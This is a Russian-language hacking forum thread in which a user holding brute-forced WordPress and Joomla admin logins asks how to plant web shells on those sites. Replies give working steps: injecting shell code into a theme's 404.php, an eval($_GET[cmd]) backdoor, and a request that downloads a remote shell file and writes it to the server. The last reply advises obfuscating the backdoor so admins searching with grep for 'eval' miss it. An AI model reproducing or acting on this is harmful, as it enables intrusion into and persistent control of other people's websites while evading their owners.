Вопрос по заливке шелла

Discussion in 'Уязвимости' started by Demchik, 16 Jul 2015.

  1. Demchik

    Demchik New Member

    Joined:
    31 Jan 2013
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    Накопилось достаточно много доступов в админки вордпресс,джумлу с брута.В большинство не получается залиться.Думаю не хватает прав на запись.Если я дам несколько доступов,может кто-нибудь посмотрет,возможно ли туда залиться в принципе или можно забить на это дело?
     
  2. Sum.cogitans

    Sum.cogitans Elder - Старейшина

    Joined:
    7 Sep 2013
    Messages:
    173
    Likes Received:
    32
    Reputations:
    19
    Закинь один из WP в личку, гляну.
    С плагинами есть хитрость - можно менять исходник, но иногда сохранение дропается, т.к. количество строк шела значительно превышает размер кода плагина.
    В таком случае, надо выбрать самый объемный или установить что-то.
     
  3. PoliGroS

    PoliGroS Member

    Joined:
    29 Mar 2012
    Messages:
    79
    Likes Received:
    8
    Reputations:
    0
    Как варик побовать пролить шелл ли в тему ил в плагины, или же произвести установку, + пробовать залить как медиа в папку аплоадс, которая почти всегда открыта для записи.
    Другой вариант попробовать взять аплоадер уже написаний и пролить.
     
  4. Sum.cogitans

    Sum.cogitans Elder - Старейшина

    Joined:
    7 Sep 2013
    Messages:
    173
    Likes Received:
    32
    Reputations:
    19
    По WordPress вопрос в личке закрыли, что касается jooml'ы вопрос открыт.
    Я ее не трогаю - брезгываю.
     
  5. strelok20094

    strelok20094 Member

    Joined:
    26 Mar 2011
    Messages:
    81
    Likes Received:
    5
    Reputations:
    2
    Если стоит плагин для управления бд сайта можно через mysql попробовать залить.
     
  6. Demchik

    Demchik New Member

    Joined:
    31 Jan 2013
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    Да,с джумлай пока непонятки...
     
  7. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    Странно, а что сложного в заливке шелла на WP? Берешь заходишь в -> Внешний Вид -> Редактор -> 404.php и туда пихаешь код шелла, заливаешься в нужное место, а потом код 404 страницы ставишь на место.
    (На будущее)
     
    grimnir likes this.
  8. Demchik

    Demchik New Member

    Joined:
    31 Jan 2013
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    приму к сведению
     
  9. Demchik

    Demchik New Member

    Joined:
    31 Jan 2013
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    не получается организовать бэкдор таким способом:
    в темах или другом месте в файл .php вставляю <?php copy('http://sait.ru/wso.txt','sys.php');exit; ?>
    по идеи должен в этой директории появится файл-шелл sys.php ,но ни хрена не выходит.Подскажите ,как сделать бзкдор
     
  10. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    Вставляешь в нужный тебе PHP-шник выполнение кода:
    Code:
    <?php eval($_GET[cmd]); ?>
    Далее:
    Code:
    site.ru/example.php?cmd=$url = "http://site.ru/shell.txt";$content = file_get_contents($url);$h = fopen("shell.php","w");$text = "$content";fwrite($h,$text);fclose($h);
    И все, шелл залит. Много раз этой вещью пользовался. А вообще тебе бы не мешало погуглить, или хотя бы поискать инфу на форуме. То что тебе нужно, уже давным давно есть.
     
  11. Demchik

    Demchik New Member

    Joined:
    31 Jan 2013
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    Спасибо за помощь.Действительно не сложно.Вернее сложно в первый раз,потом легче.У меня
    <?php eval($_GET[cmd]); ?> срабатывает только ,если помещать в первую строку файла.Это бросается в глаза,когда открываешь файл.Есть способ втюхать между строк,в общем ,как нибудь замаскировать ?
     
  12. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    Ты надеюсь не пихал в середину скрипта <?php ... ?>?) Можно не только в начало, если хочешь между строк, <?php и ?> надо убрать) А вообще, есть PHP-обфусификаторы, даже онлайн. Если хочешь можешь покопаться в этом деле, может и получиться спрятать бэкдор. А то если так посудить, любой админ маломальски знающий linux сможет обнаружить это дело.
    Code:
    grep -rl "eval" /var/www/
    Оно пройдется по всем файлам и будет искать соответствие и спалит все файлы где найдет. Тут обфусификация кода тебе должна помочь)
     
    Demchik likes this.
Loading...